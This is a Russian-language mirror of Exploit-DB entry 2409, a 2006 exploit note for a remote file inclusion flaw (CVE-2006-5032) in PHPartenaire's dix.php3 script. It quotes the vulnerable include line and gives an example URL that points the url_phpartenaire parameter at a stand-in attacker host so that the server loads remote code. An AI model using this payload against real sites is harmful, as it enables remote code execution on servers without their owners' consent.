- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2409
- Проверка EDB
-
- Пройдено
- Автор
- DADISS
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-5032
- Дата публикации
- 2006-09-21
Код:
#===================================================================================#
#
# PHPartenaire => $url_phpartenaire Remote File Inclusion Exploit
#
#===================================================================================#
#
# Softname : PHPartenaire
# Url : http://ograweb.free.fr/phpartenaire/
# Exploit type : Remote File Inclusion.
# Critical: Dangerous.
# Solution Status: Unpatched.
#
#===================================================================================#
#
# By DaDIsS - Member of the Moroccan Hackers Team
#
#===================================================================================#
#
# Exploit Explanation :
#
#
# The flaw resides in dix.php3 file that contain this code :
#
# in line 9 :
#
# include($url_phpartenaire."/config.php3");
#
#===================================================================================#
#
# Example :
#
#
# http://www.victime.com/(path)/dix.php3?url_phpartenaire=http://attacker
#
#
#================================================================#
#
# Greetz : YouYouCool, Hacker1, and all Moroccan Hackers Team, viva Morocco guyz !!
#
#===================================================================================#
#
# DaDIsS / [email protected]
# Proud to be a Moroccan !
#
#===================================================================================#
# milw0rm.com [2006-09-21]
- Источник
- www.exploit-db.com